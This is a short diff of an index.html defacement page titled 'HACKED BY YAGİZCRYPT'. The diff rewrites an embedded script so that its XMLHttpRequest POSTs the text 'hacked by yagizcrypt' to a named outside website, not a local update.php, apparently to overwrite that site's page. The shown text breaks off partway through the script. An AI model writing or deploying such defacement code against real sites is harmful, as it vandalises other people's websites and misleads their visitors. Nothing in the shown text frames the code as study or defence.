--- a/index.html
+++ b/index.html
@@ -9,7 +9,7 @@
     <center><h1>HACKED BY YAGİZCRYPT</h1></center>
     <script>
     var xhr = new XMLHttpRequest();
-    xhr.open("POST", "update.php", true);
+    xhr.open("POST", "https://papers.cumincad.org/index.html", true);
     xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
 
     var newContent = "hacked by yagizcrypt";
